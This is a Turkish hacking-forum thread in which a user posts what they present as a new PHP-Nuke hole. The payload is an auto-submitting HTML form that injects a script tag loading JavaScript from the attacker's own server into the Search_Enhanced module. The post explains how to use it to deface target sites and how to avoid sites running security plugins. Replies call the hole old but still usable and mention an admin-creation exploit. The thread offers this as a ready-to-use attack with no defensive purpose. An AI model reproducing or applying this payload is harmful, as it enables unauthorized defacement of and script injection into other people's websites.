folder Tahribat.com Forumları
linefolder Bilişim Güvenliği
linefolder Phpnuke All Version Açigi



Phpnuke All Version Açigi

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    BBS
    BBS's avatar
    Kayıt Tarihi: 02/Ağustos/2006
    Erkek

    Evet arkadaslar simdi size tüm php nuke sürümlerinde çalisan hatta php nukenin kendi sitesi bile index yedi bu açikla =) açik daha yayilmadi kimsenin haberi yok ama ben sizlerle paylaşıyorum.

    sözüne edilen açik herhangi site üzerinden js kod çalistirmaniza yariyor

    Iste kodlar;

    <html>
    <form name=searchform method=post action=http://site.com/modules.php?op=modload&name=Searc h_Enhanced&file=index>
    <input type="text" name="query" size="15" value='<script src=http://sizinjskodunolduguadres/js.js></script>' >
    <input type=submit name=sub>
    <script>document.searchform.sub.click()</script>
    </html>

    Evet arkadaslar bu kodlarda site.com yazan yere hacklemek istediginiz php nuke kullanan sitenin adini yazin ve sizinjskodunolduguadres yazan yere ise herhangi bir js kod hazirlayin ve hacked falan yazin ve oranin l inkini verdikten sonra bu dosyayihtml olarak kaydedin ve html dosyasi açtigimizda

    Sorguyu Gönder diyerek Index atabiliriz ve sözülen edilen js yi çagirabiliriz =)

    Sitede mantik olarak su kodu Kullaniyor;

    <script src=http://www.site.com/js.js></script>

    ve Bu kod siteyi js.js olarak verilen adresteki js yi çagiriyor.

    selametle...


    ..
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    BBS
    BBS's avatar
    Kayıt Tarihi: 02/Ağustos/2006
    Erkek

    Biraz Bilgi Vereyim.Çalismasi Için;


    1 - Modload Modülünün Kurulu ve Aktif Olmasi Gerekmektedir.


    2 - HTML Kodlarinin Yasaklanmamis Olmasi Gerekiyor.


    3- NukeSentinel , AdminSecure Gibi Güvenlik Yazilimlarinin Kurulu Oldugu Sitelerde Hiç Denemeyin Çalismaz.

    4- Her sitede olcak diye bir şart yok önlem almış olabilir (ama açıgı geliştirebilirsinz)


    ..
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    exploit
    exploit's avatar
    Kayıt Tarihi: 28/Ağustos/2005
    Erkek
    bu açık çok eski bi açık :S..

  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    chucky3419
    chucky3419's avatar
    Kayıt Tarihi: 12/Haziran/2007
    Erkek
    Arkadaşım güzel bir çalışma ama alıntı yazmayı uunutmuşsun :)) eski bir acık olabilir ama hala işe yarıyor ya bu yontem yada admin oluşturma exoploiti ile oho nuke hackleyeblirsiniz ;)
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Gastarbeiter
    ExcaliburTBT
    ExcaliburTBT's avatar
    Kayıt Tarihi: 06/Aralık/2005
    Erkek

    2 - HTML Kodlarinin Yasaklanmamis Olmasi Gerekiyor.

    :D Oldu canım

  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    HackMan
    HackMan's avatar
    Kayıt Tarihi: 02/Ağustos/2006
    Erkek
    + Add Lammer Tools :)

    Sevmekten Korkmuyorum; Kitabını çalıştım... Başımdan geçmişi var; her cefaya alıştım...
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Sigortacı
    DJ_Alper
    DJ_Alper's avatar
    Bilgi/Destek Madalyası
    Kayıt Tarihi: 03/Ocak/2006
    Erkek
    Len bende ürktüm yenimi açık diye :)) bi bk a yaramaz bu dayı siz forum açığı deneyin şahsen ben 3 defa yemiş biri olarak çünkü nuke kullanan adam forumu güncellemeye üşenir çünkü eklentileri gider ben şahsen öyleydim ama bir gün geldiğimde foruma tıklayınca karıları karşımda görünce son sürüme yükselttim :)

    Sorularınızı cilginsigortaci@gmail.com a yazabilirsiniz cevaplar instagram sayfasında >>>instagram/cilginsigortaci/ █║▌│█│║▌║││█║▌║▌║
Toplam Hit: 13953 Toplam Mesaj: 7